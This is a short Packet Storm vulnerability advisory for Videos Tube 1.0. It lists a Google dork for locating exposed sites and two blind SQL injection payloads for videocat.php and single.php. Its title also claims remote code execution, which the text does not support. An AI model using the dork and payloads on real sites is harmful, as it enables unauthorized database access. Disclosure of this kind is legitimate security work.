Videos Tube version 1.0 suffers from remote SQL injection vulnerabilities.
2a0c8fbefd4cb32a3a95c179b8a11890513347579e7c81722ade6e82bc23447f|
# Exploit Title: Videos Tube SQL Injection and Remote Code Execution|
|# Google Dork: inurl:"single.php?url=" video|
|# Date: 05.05.2014|
|# Exploit Author: Mustafa ALTINKAYNAK|
|# Vendor Homepage: http://www.phpscriptlerim.com|
|# Software Link: http://demo.phpscriptlerim.com/free/videostube/|
|# Version: 1.0|
|Description (Açýklama)|
|========================|
|Category, showing video on the page are two types of SQL injection.
Boolean-based blind and AND / OR time-based blind. Incoming data can be
filtered off light.|
|Vulnerability|
|========================|
|1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP
Tool)|
|2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)|
--
*Mustafa ALTINKAYNAK***
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed